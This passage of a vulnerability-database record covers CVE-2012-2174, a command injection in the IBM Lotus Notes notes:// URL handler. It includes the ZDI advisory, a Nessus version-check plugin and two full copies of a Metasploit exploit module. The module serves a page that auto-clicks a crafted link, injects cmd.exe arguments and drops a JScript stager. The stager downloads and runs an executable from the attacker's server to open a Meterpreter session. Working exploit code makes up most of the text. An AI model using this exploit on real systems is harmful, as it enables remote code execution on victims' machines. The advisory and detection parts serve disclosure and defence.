analysis\r\n\t\t\t\t\t'juan vazquez' # Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-2174' ],\r\n\t\t\t\t\t[ 'OSVDB', '83063' ],\r\n\t\t\t\t\t[ 'BID', '54070' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],\r\n\t\t\t\t\t[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => \"none\",\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -k -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Jun 18 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@exe_name = rand_text_alpha(2) + \".exe\"\r\n\t\t@stage_name = rand_text_alpha(2) + \".js\"\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_new_session(session)\r\n\t\tif session.type == \"meterpreter\"\r\n\t\t\tsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n\t\tend\r\n\r\n\t\t@dropped_files.delete_if do |file|\r\n\t\t\twin_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n\t\t\tif session.type == \"meterpreter\"\r\n\t\t\t\tbegin\r\n\t\t\t\t\twintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n\t\t\t\t\twin_file = \"#{wintemp}\\\\#{win_file}\"\r\n\t\t\t\t\t# Meterpreter should do this automatically as part of\r\n\t\t\t\t\t# fs.file.rm(). Until that has been implemented, remove the\r\n\t\t\t\t\t# read-only flag with a command.\r\n\t\t\t\t\tsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n\t\t\t\t\tsession.fs.file.rm(win_file)\r\n\t\t\t\t\tprint_good(\"Deleted #{file}\")\r\n\t\t\t\t\ttrue\r\n\t\t\t\trescue ::Rex::Post::Meterpreter::RequestError\r\n\t\t\t\t\tprint_error(\"Failed to delete #{win_file}\")\r\n\t\t\t\t\tfalse\r\n\t\t\t\tend\r\n\r\n\t\t\tend\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tif request.uri =~ /\\.exe$/\r\n\t\t\treturn if ((p=regenerate_payload(cli))==nil)\r\n\t\t\tregister_file_for_cleanup(\"#{@stage_name}\") unless @dropped_files and @dropped_files.include?(\"#{@stage_name}\")\r\n\t\t\tregister_file_for_cleanup(\"#{@exe_name}\") unless @dropped_files and @dropped_files.include?(\"#{@exe_name}\")\r\n\t\t\tdata = generate_payload_exe({:code=>p.encoded})\r\n\t\t\tprint_status(\"Sending payload\")\r\n\t\t\tsend_response(cli, data, {'Content-Type'=>'application/octet-stream'})\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tif datastore['SSL']\r\n\t\t\tschema = \"https\"\r\n\t\telse\r\n\t\t\tschema = \"http\"\r\n\t\tend\r\n\t\turi = \"#{schema}://#{my_host}\"\r\n\t\turi << \":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe\"\r\n\r\n\t\tscript = \"var w=new ActiveXObject('wscript.shell');\"\r\n\t\tscript << \"w.CurrentDirectory=w.ExpandEnvironmentStrings('\\\\%TEMP\\\\%');\"\r\n\t\tscript << \"var x=new ActiveXObject('Microsoft.XMLHTTP');\"\r\n\t\tscript << \"x.open('GET','#{uri}', false);\"\r\n\t\tscript << \"x.send();\"\r\n\t\tscript << \"var s=new ActiveXObject('ADODB.Stream');\"\r\n\t\tscript << \"s.Mode=3;\"\r\n\t\tscript << \"s.Type=1;\"\r\n\t\tscript << \"s.Open();\"\r\n\t\tscript << \"s.Write(x.responseBody);\"\r\n\t\tscript << \"s.SaveToFile('#{@exe_name}',2);\"\r\n\t\tscript << \"w.Run('#{@exe_name}');\"\r\n\r\n\t\tvmargs = \"/q /s /c echo #{script} > %TEMP%\\\\\\\\#{@stage_name}& start cscript %TEMP%\\\\\\\\#{@stage_name}& REM\"\r\n\r\n\t\tlink_id = rand_text_alpha(5 + rand(5))\r\n\r\n\t\tjs_click_link = %Q|\r\n\t\tfunction clickLink(link) {\r\n\t\t\tvar cancelled = false;\r\n\r\n\t\t\tif (document.createEvent) {\r\n\t\t\t\tvar event = document.createEvent(\"MouseEvents\");\r\n\t\t\t\tevent.initMouseEvent(\"click\", true, true, window,\r\n\t\t\t\t\t0, 0, 0, 0, 0,\r\n\t\t\t\t\tfalse, false, false, false,\r\n\t\t\t\t\t0, null);\r\n\t\t\t\tcancelled = !link.dispatchEvent(event);\r\n\t\t\t}\r\n\t\t\telse if (link.fireEvent) {\r\n\t\t\t\tcancelled = !link.fireEvent(\"onclick\");\r\n\t\t\t}\r\n\r\n\t\t\tif (!cancelled) {\r\n\t\t\t\twindow.location = link.href;\r\n\t\t\t}\r\n\t\t}\r\n\t\t|\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)\r\n\t\t\tjs_click_link.obfuscate\r\n\t\t\tjs_click_link_fn = js_click_link.sym('clickLink')\r\n\t\telse\r\n\t\t\tjs_click_link_fn = 'clickLink'\r\n\t\tend\r\n\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\t#{js_click_link}\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"#{js_click_link_fn}(document.getElementById('#{link_id}'));\">\r\n\t\t<a id=\"#{link_id}\" href=\"notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\\\windows\\\\system32\\\\cmd.exe -vmargs #{vmargs}\"></a>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\tprint_status(\"Sending html\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\r\n\tend\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23650/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-2174"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-154 : IBM Lotus Notes URL Command Injection Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-154\r\nAugust 22, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2012-2174\r\n\r\n- -- CVSS:\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\nIBM\r\n\r\n- -- Affected Products:\r\nIBM Lotus Notes\r\n\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11839.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of IBM Lotus Notes. User interaction is required\r\nto exploit this vulnerability in that the target must visit a malicious\r\npage or open a malicious file.\r\n\r\nThe specific flaw exists within notes.exe. When handling URLs, it is\r\npossible to inject the -RPARAMS command line argument into the call to\r\nnotes.exe, which will then launch rcplauncher.exe. Including the java -vm\r\ncommand will allow for the attacker to execute code under the context of\r\nthe process.\r\n\r\n- -- Vendor Response:\r\nIBM has issued an update to correct this vulnerability. More details can be\r\nfound at:\r\nhttp://www-304.ibm.com/support/docview.wss?uid=swg21598348\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2011-12-22 - Vulnerability reported to vendor\r\n2012-08-22 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n* Moritz Jodeit\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBUDUEz1VtgMGTo1scAQJ/bggAqlRPPa/9m/PYcfpm1w/66uerv/HUV9m8\r\nZgBA6/EUsl83PNb3BeCgqJprCv3GM3J6knYTVO1RC5DDc5Z3f2XWN1gmZC9b7ZGj\r\nFb6O+A710Yfw7VfUxsBfcNuobQreS5e8sV1Rr9YV+grWHzonObPyT6JSTYPb0Ldi\r\nIlnlILy6CDrFafmDW16l6yir5lBQ5TCdtstbPCO5A+IJT911KXo44fGuO5hc+1VQ\r\n9Zy+L9By/onjFA9AdH/WH62lp0NmUkDJX0yydlnNNlOEEF0fnBqNBPxQSnMWr5Cl\r\n6THwlcLwGYFm/bSHh7D7F3BOpspWh/VuulRvNnkSEZxNS+xnrj3Hcg==\r\n=gM97\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-08-27T00:00:00", "published": "2012-08-27T00:00:00", "id": "SECURITYVULNS:DOC:28414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28414", "title": "ZDI-12-154 : IBM Lotus Notes URL Command Injection Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:48", "bulletinFamily": "software", "cvelist": ["CVE-2012-2174"], "description": "URI handler command injection.", "edition": 1, "modified": "2012-08-27T00:00:00", "published": "2012-08-27T00:00:00", "id": "SECURITYVULNS:VULN:12529", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12529", "title": "IBM Lotus Notes code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:50:39", "description": "CVE ID: CVE-2012-2174\r\n\r\nIBM Lotus Notes\u662f\u684c\u9762\u5ba2\u6237\u7aef\uff0c\u4e3a\u7528\u6237\u63d0\u4f9b\u4e86\u5355\u70b9\u8bbf\u95ee\u529f\u80fd\uff0c\u6709\u52a9\u4e8e\u4ed6\u4eec\u521b\u5efa\u3001\u67e5\u8be2\u548c\u5171\u4eab\u77e5\u8bc6\uff0c\u4e0e\u56e2\u961f\u534f\u4f5c\uff0c\u4ee5\u53ca\u91c7\u53d6\u76f8\u5e94\u63aa\u65bd\u3002\r\n\r\nIBM Lotus Notes 8.0.2\u30018.5\u30018.5.1\u30018.5.2\u30018.5.3\u5728"notes" URI\u5904\u7406\u7a0b\u5e8f\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u53ef\u88ab\u5229\u7528\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\n0\nIBM Lotus Notes 8.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nIBM\r\n---\r\nIBM\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff081598348\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\n1598348\uff1aSecurity Bulletin: IBM Lotus Notes URL Command Injection Remote Code Execution Vulnerability (CVE-2012-2174)\r\n\r\n\u94fe\u63a5\uff1ahttp://www-304.ibm.com/support/docview.wss?uid=swg21598348", "published": "2012-06-23T00:00:00", "type": "seebug", "title": "IBM Lotus Notes 8.x "notes" URI\u5904\u7406\u5668\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "modified": "2012-06-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60226", "id": "SSV:60226", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T03:34:52", "description": "The remote host has a version of Lotus Notes prior to 8.5.3 Fix Pack\n2 installed. It is, therefore, reportedly affected by a remote code\nexecution vulnerability that an attacker can exploit by tricking a\nvictim into clicking a specially crafted 'notes://' URL. \n\nNote that this vulnerability can only be exploited when the software\nis running in 'standard' mode.", "edition": 29, "published": "2012-08-10T00:00:00", "title": "IBM Lotus Notes < 8.5.3 FP2 URL Handler Unspecified Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2174"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:ibm:lotus_notes"], "id": "LOTUS_NOTES_8_5_3_FP2.NASL", "href": "https://www.tenable.com/plugins/nessus/61487", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61487);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2012-2174\");\n script_bugtraq_id(54070);\n\n script_name(english:\"IBM Lotus Notes < 8.5.3 FP2 URL Handler Unspecified Remote Code Execution\");\n script_summary(english:\"Checks version of IBM Lotus Notes\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has software installed that is affected by a code\nexecution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host has a version of Lotus Notes prior to 8.5.3 Fix Pack\n2 installed. It is, therefore, reportedly affected by a remote code\nexecution vulnerability that an attacker can exploit by tricking a\nvictim into clicking a specially crafted 'notes://' URL. \n\nNote that this vulnerability can only be exploited when the software\nis running in 'standard' mode.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-154/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2012/Aug/275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-01.ibm.com/support/docview.wss?uid=swg21598348\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Lotus Notes 8.5.3 Fix Pack 2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM Lotus Notes Client URL Handler Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:lotus_notes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"lotus_notes_installed.nasl\");\n script_require_keys(\"SMB/Lotus_Notes/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"IBM Lotus Notes\";\nkb_base = \"SMB/Lotus_Notes/\";\n\nversion = get_kb_item_or_exit(kb_base + 'Version');\npath = get_kb_item_or_exit(kb_base + 'Path');\nver_ui = get_kb_item_or_exit(kb_base + 'Version_UI');\n\nfix = '8.5.32.12184';\n\nif (\n version =~ \"^8\\.\" &&\n ver_compare(ver:version, fix:fix, strict:FALSE) == -1\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver_ui + \n '\\n Fixed version : 8.5.3 FP2 (' + fix + ')' +\n '\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n} \nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, ver_ui, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:27", "bulletinFamily": "info", "cvelist": ["CVE-2012-2174"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM Lotus Notes. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within notes.exe. When handling URLs, it is possible to inject the -RPARAMS command line argument into the call to notes.exe, which will then launch rcplauncher.exe. Including the java -vm command will allow for the attacker to execute code under the context of the process.", "modified": "2012-06-22T00:00:00", "published": "2012-08-22T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-154/", "id": "ZDI-12-154", "title": "IBM Lotus Notes URL Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:02:54", "description": "This module exploits a command injection vulnerability in the URL handler for for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with a specially crafted notes:// URL to execute arbitrary commands with also arbitrary arguments. This module has been tested successfully on Windows XP SP3 with IE8, Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.\n", "published": "2012-12-24T15:23:19", "type": "metasploit", "title": "IBM Lotus Notes Client URL Handler Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/NOTES_HANDLER_CMDINJECT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"IBM Lotus Notes Client URL Handler Command Injection\",\n 'Description' => %q{\n This module exploits a command injection vulnerability in the URL handler for\n for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\n a specially crafted notes:// URL to execute arbitrary commands with also arbitrary\n arguments. This module has been tested successfully on Windows XP SP3 with IE8,\n Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Moritz Jodeit', # Vulnerability discovery\n 'Sean de Regge', # Vulnerability analysis\n 'juan vazquez' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2012-2174' ],\n [ 'OSVDB', '83063' ],\n [ 'BID', '54070' ],\n [ 'ZDI', '12-154' ],\n [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],\n [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"none\",\n 'InitialAutoRunScript' => 'migrate -k -f'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-06-18',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n end\n\n def exploit\n @exe_name = rand_text_alpha(2) + \".exe\"\n @stage_name = rand_text_alpha(2) + \".js\"\n super\n end\n\n def on_new_session(session)\n if session.type == \"meterpreter\"\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\n\n @dropped_files.delete_if do |file|\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\n begin\n wintemp = session.sys.config.getenv('TEMP')\n win_file = \"#{wintemp}\\\\#{win_file}\"\n # Meterpreter should do this automatically as part of\n # fs.file.rm(). Until that has been implemented, remove the\n # read-only flag with a command.\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\n session.fs.file.rm(win_file)\n print_good(\"Deleted #{file}\")\n true\n rescue ::Rex::Post::Meterpreter::RequestError\n print_error(\"Failed to delete #{win_file}\")\n false\n end\n end\n end\n\n end\n\n def on_request_uri(cli, request)\n\n if request.uri =~ /\\.exe$/\n return if ((p=regenerate_payload(cli))==nil)\n register_file_for_cleanup(\"#{@stage_name}\") unless @dropped_files and @dropped_files.include?(\"#{@stage_name}\")\n register_file_for_cleanup(\"#{@exe_name}\") unless @dropped_files and @dropped_files.include?(\"#{@exe_name}\")\n data = generate_payload_exe({:code=>p.encoded})\n print_status(\"Sending payload\")\n send_response(cli, data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n if datastore['SSL']\n schema = \"https\"\n else\n schema = \"http\"\n end\n uri = \"#{schema}://#{my_host}\"\n uri << \":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe\"\n\n script = \"var w=new ActiveXObject('wscript.shell');\"\n script << \"w.CurrentDirectory=w.ExpandEnvironmentStrings('\\\\%TEMP\\\\%');\"\n script << \"var x=new ActiveXObject('Microsoft.XMLHTTP');\"\n script << \"x.open('GET','#{uri}', false);\"\n script << \"x.send();\"\n script << \"var s=new ActiveXObject('ADODB.Stream');\"\n script << \"s.Mode=3;\"\n script << \"s.Type=1;\"\n script << \"s.Open();\"\n script << \"s.Write(x.responseBody);\"\n script << \"s.SaveToFile('#{@exe_name}',2);\"\n script << \"w.Run('#{@exe_name}');\"\n\n vmargs = \"/q /s /c echo #{script} > %TEMP%\\\\\\\\#{@stage_name}& start cscript %TEMP%\\\\\\\\#{@stage_name}& REM\"\n\n link_id = rand_text_alpha(5 + rand(5))\n\n js_click_link = %Q|\n function clickLink(link) {\n var cancelled = false;\n\n if (document.createEvent) {\n var event = document.createEvent(\"MouseEvents\");\n event.initMouseEvent(\"click\", true, true, window,\n 0, 0, 0, 0, 0,\n false, false, false, false,\n 0, null);\n cancelled = !link.dispatchEvent(event);\n }\n else if (link.fireEvent) {\n cancelled = !link.fireEvent(\"onclick\");\n }\n\n if (!cancelled) {\n window.location = link.href;\n }\n }\n |\n\n if datastore['OBFUSCATE']\n js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)\n js_click_link.obfuscate(memory_sensitive: true)\n js_click_link_fn = js_click_link.sym('clickLink')\n else\n js_click_link_fn = 'clickLink'\n end\n\n\n html = <<-EOS\n <html>\n <head>\n <script>\n #{js_click_link}\n </script>\n </head>\n <body onload=\"#{js_click_link_fn}(document.getElementById('#{link_id}'));\">\n <a id=\"#{link_id}\" href=\"notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\\\windows\\\\system32\\\\cmd.exe -vmargs #{vmargs}\"></a>\n </body>\n </html>\n EOS\n\n print_status(\"Sending html\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/notes_handler_cmdinject.rb"}]}
